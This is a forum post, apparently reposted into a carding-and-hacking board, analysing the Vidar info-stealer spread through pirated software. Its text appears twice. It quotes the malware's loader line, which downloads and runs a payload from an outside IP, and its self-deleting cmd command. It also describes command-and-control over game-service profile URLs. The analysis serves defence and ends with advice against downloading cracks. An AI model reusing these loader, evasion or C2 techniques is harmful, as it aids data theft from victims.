Home
Forums
New posts
Search forums
What's new
New posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Search profile posts
Log in
Register
What's new
Search
Search
Search titles only
By:
New posts
Search forums
Menu
Log in
Register
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Home
Forums
CARDING & HACKING
HOSTING & BOTNET
Pirated software and its consequences: an analysis of the oldest and simplest viral foothold on the Internet
Message
<blockquote data-quote="Ghosthunter" data-source="post: 503" data-attributes="member: 6"><p><h4>6. Installing additional malware</h4><p>This step is mandatory and is always performed. The following line in the configuration file is responsible for this process:</p><p></p><p>ldr_1:<a href="http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/8465766547424604901.bin%7C%TEMP%/%7Cexe" target="_blank">http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/8465766547424604901.bin|%TEMP%\|exe</a></p><p></p><p>The choice of payload loaded by the malware is left to the attacker. The analyzed sample contained the usual Java Spybee keylogger, which is publicly available on the GitHub platform. A controversial choice. Why it was chosen is a mystery.</p><p></p><p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/e95/0da/1c8/e950da1c86292dc26fc4a5786fb2ecb7.png" alt="e950da1c86292dc26fc4a5786fb2ecb7.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p>Also, this line shows an additional server that is currently unavailable, so it is still impossible to get deeper into the malware's infrastructure.</p><p></p><h4>7. Self-destruct</h4><p>Such a step was not available to Raccoon. After launching it on the victim's device, it remained there until thawed. Vidar, on the other hand, can sneak into the system, do all his dirty work, and leave unnoticed.</p><p></p><p>Deletion occurs in a very primitive way and is the launch of the next line via CMD Windows:</p><p></p><p>“C:\Windows\System32\cmd.exe” /c taskkill /im [Filename] /f & erase [File path] & exit</p><p></p><h4>A brief dynamic analysis of the malware</h4><p>All tests are performed on a virtual machine. In any case, do not repeat this yourself, especially on the main device.</p><p></p><p>For dynamic analysis, we already have the following setup of utilities (all of them are publicly available):</p><ol> <li data-xf-list-type="ol">ProcessHacker — simple and tasteful, let's watch how the virus interacts with others .the dll and the system.</li> <li data-xf-list-type="ol">TCPView is a utility that tracks outgoing TCP connections.</li> <li data-xf-list-type="ol">Regshot is a very simple open source application that allows you to view changes in the registry after running the malware.</li> </ol><p></p><p></p><p>We make an impression of the Windows registry, open all our utilities and carefully monitor what is happening.</p><p></p><p>Immediately after opening the malware, a second process appears on the virtual machine explorer.exe, in which the large letter “i” replaces the small "L". This is a favorite method of disguising malware. It is worth noting that an inexperienced user is unlikely to be able to distinguish a real explorer from a fake one.</p><p></p><p>First, the Vidar sends a GET request to the following IP address: 104.17.63.50. As expected, this server belongs to the service FACEIT.com.</p><p></p><p>Next, the malicious process establishes a connection to the server 93.184.220.29. I remind you that this server was responsible for uploading additional virus software to the victim's machine.</p><p></p><p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/646/4ac/628/6464ac6281001c3bdd4f44f67bf8da4c.png" alt="6464ac6281001c3bdd4f44f67bf8da4c.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p>After 30 seconds, the process disappears from view. If the Java package was installed on my machine, the SpyBee keylogger would start, and since there is no library, there is no secondary malware either.</p><p></p><p>When comparing casts of the registry, you can clearly see how Vidar covered his tracks by deleting himself:</p><p></p><p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/67c/c63/108/67cc631087d899a3dfe0a732b8f11a50.png" alt="67cc631087d899a3dfe0a732b8f11a50.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>And the malware, in addition, also removed the kerchief. What for? For what? Riddle of the century.</p><p></p><h4>Some analysis of the Faceit profile and its API</h4><p>So, we have the nickname of the attacker, this account is currently active. Not a single game has been played on it, and it just hangs like a dummy.</p><p></p><p></p><p></p><p></p><p>This particular account was registered on December 15, 2022 in Russia, almost three months ago.</p><p></p><p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/fef/b9b/527/fefb9b5277d42972a501b1d423b684d2.png" alt="fefb9b5277d42972a501b1d423b684d2.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p><u>Earlier, Cyble researchers</u> found several more such profiles used as C&C servers.</p><p></p><p>List of profiles</p><p></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/yetveirrifcu" target="_blank">https://api.faceit.com/core/v1/nicknames/yetveirrifcu</a></u></em></p><p><em><u>https:/ /api.faceit.com/core/v1/nicknames/tronhack</u></em></p><p><em><u></u></em></p><p><em><u></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/slowyen" target="_blank">https://api.faceit.com/core/v1/nicknames/slowyen</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/sergeevih" target="_blank">https://api.faceit.com/core/v1/nicknames/sergeevih</a></u></em></p><p><em><u>https ://api.faceit.com/core/v1/nicknames/dendytest</u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/xeronxik123" target="_blank">https://api.faceit.com/core/v1/nicknames/xeronxik123</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/vyh62lapin" target="_blank">https://api.faceit.com/core/v1/nicknames/vyh62lapin</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/sslamlssa" target="_blank">https://api.faceit.com/core/v1/nicknames/sslamlssa</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/ramilgame" target="_blank">https://api.faceit.com/core/v1/nicknames/ramilgame</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/legomind" target="_blank">https://api.faceit.com/core/v1/nicknames/legomind</a></u></em></p><p><em><u><a href="https://api.faceit.com/core/v1/nicknames/pavel23puef" target="_blank">https://api.faceit.com/core/v1/nicknames/pavel23puef</a></u></em></p><p>They change every few days, so it's still impossible to track and stop their work.</p><p></p><p></p><h4>Conclusions</h4><p>So, we managed to analyze in detail the specifics of the Vidar virus, which was distributed through pirate sites along with the Raccoon Stealer malware.</p><p></p><p>Both malware are very similar and clearly came from the pen of one team or a specific person, as they have a similar concept of actions.</p><p></p><p>What is really unusual is that Vidar used the API interface of a public game service as a command server.</p><p></p><p>It is noteworthy that the virus is updated very frequently and not all antivirus programs are able to detect it. But since Vidar is not distributed through critical vulnerabilities or droppers, it is enough just not to download those "cracks" from the search engine — and you will be happy, dear readers.</p><p></p><p>That's it for me. Be there.</p></blockquote><p></p>
[QUOTE="Ghosthunter, post: 503, member: 6"] [HEADING=3]6. Installing additional malware[/HEADING] This step is mandatory and is always performed. The following line in the configuration file is responsible for this process: ldr_1:[URL='http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/8465766547424604901.bin%7C%TEMP%/%7Cexe']http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/8465766547424604901.bin|%TEMP%\|exe[/URL] The choice of payload loaded by the malware is left to the attacker. The analyzed sample contained the usual Java Spybee keylogger, which is publicly available on the GitHub platform. A controversial choice. Why it was chosen is a mystery. [IMG alt="e950da1c86292dc26fc4a5786fb2ecb7.png"]https://habrastorage.org/r/w1560/getpro/habr/upload_files/e95/0da/1c8/e950da1c86292dc26fc4a5786fb2ecb7.png[/IMG] Also, this line shows an additional server that is currently unavailable, so it is still impossible to get deeper into the malware's infrastructure. [HEADING=3]7. Self-destruct[/HEADING] Such a step was not available to Raccoon. After launching it on the victim's device, it remained there until thawed. Vidar, on the other hand, can sneak into the system, do all his dirty work, and leave unnoticed. Deletion occurs in a very primitive way and is the launch of the next line via CMD Windows: “C:\Windows\System32\cmd.exe” /c taskkill /im [Filename] /f & erase [File path] & exit [HEADING=3]A brief dynamic analysis of the malware[/HEADING] All tests are performed on a virtual machine. In any case, do not repeat this yourself, especially on the main device. For dynamic analysis, we already have the following setup of utilities (all of them are publicly available): [LIST=1] [*]ProcessHacker — simple and tasteful, let's watch how the virus interacts with others .the dll and the system. [*]TCPView is a utility that tracks outgoing TCP connections. [*]Regshot is a very simple open source application that allows you to view changes in the registry after running the malware. [/LIST] We make an impression of the Windows registry, open all our utilities and carefully monitor what is happening. Immediately after opening the malware, a second process appears on the virtual machine explorer.exe, in which the large letter “i” replaces the small "L". This is a favorite method of disguising malware. It is worth noting that an inexperienced user is unlikely to be able to distinguish a real explorer from a fake one. First, the Vidar sends a GET request to the following IP address: 104.17.63.50. As expected, this server belongs to the service FACEIT.com. Next, the malicious process establishes a connection to the server 93.184.220.29. I remind you that this server was responsible for uploading additional virus software to the victim's machine. [IMG alt="6464ac6281001c3bdd4f44f67bf8da4c.png"]https://habrastorage.org/r/w1560/getpro/habr/upload_files/646/4ac/628/6464ac6281001c3bdd4f44f67bf8da4c.png[/IMG] After 30 seconds, the process disappears from view. If the Java package was installed on my machine, the SpyBee keylogger would start, and since there is no library, there is no secondary malware either. When comparing casts of the registry, you can clearly see how Vidar covered his tracks by deleting himself: [IMG alt="67cc631087d899a3dfe0a732b8f11a50.png"]https://habrastorage.org/r/w1560/getpro/habr/upload_files/67c/c63/108/67cc631087d899a3dfe0a732b8f11a50.png[/IMG] And the malware, in addition, also removed the kerchief. What for? For what? Riddle of the century. [HEADING=3]Some analysis of the Faceit profile and its API[/HEADING] So, we have the nickname of the attacker, this account is currently active. Not a single game has been played on it, and it just hangs like a dummy. This particular account was registered on December 15, 2022 in Russia, almost three months ago. [IMG alt="fefb9b5277d42972a501b1d423b684d2.png"]https://habrastorage.org/r/w1560/getpro/habr/upload_files/fef/b9b/527/fefb9b5277d42972a501b1d423b684d2.png[/IMG] [U]Earlier, Cyble researchers[/U] found several more such profiles used as C&C servers. List of profiles [I][U][URL]https://api.faceit.com/core/v1/nicknames/yetveirrifcu[/URL] https:/ /api.faceit.com/core/v1/nicknames/tronhack [URL]https://api.faceit.com/core/v1/nicknames/slowyen[/URL] [URL]https://api.faceit.com/core/v1/nicknames/sergeevih[/URL] https ://api.faceit.com/core/v1/nicknames/dendytest [URL]https://api.faceit.com/core/v1/nicknames/xeronxik123[/URL] [URL]https://api.faceit.com/core/v1/nicknames/vyh62lapin[/URL] [URL]https://api.faceit.com/core/v1/nicknames/sslamlssa[/URL] [URL]https://api.faceit.com/core/v1/nicknames/ramilgame[/URL] [URL]https://api.faceit.com/core/v1/nicknames/legomind[/URL] [URL]https://api.faceit.com/core/v1/nicknames/pavel23puef[/URL][/U][/I] They change every few days, so it's still impossible to track and stop their work. [HEADING=3]Conclusions[/HEADING] So, we managed to analyze in detail the specifics of the Vidar virus, which was distributed through pirate sites along with the Raccoon Stealer malware. Both malware are very similar and clearly came from the pen of one team or a specific person, as they have a similar concept of actions. What is really unusual is that Vidar used the API interface of a public game service as a command server. It is noteworthy that the virus is updated very frequently and not all antivirus programs are able to detect it. But since Vidar is not distributed through critical vulnerabilities or droppers, it is enough just not to download those "cracks" from the search engine — and you will be happy, dear readers. That's it for me. Be there. [/QUOTE]
Name
Verification
Post reply
Home
Forums
CARDING & HACKING
HOSTING & BOTNET
Pirated software and its consequences: an analysis of the oldest and simplest viral foothold on the Internet
Top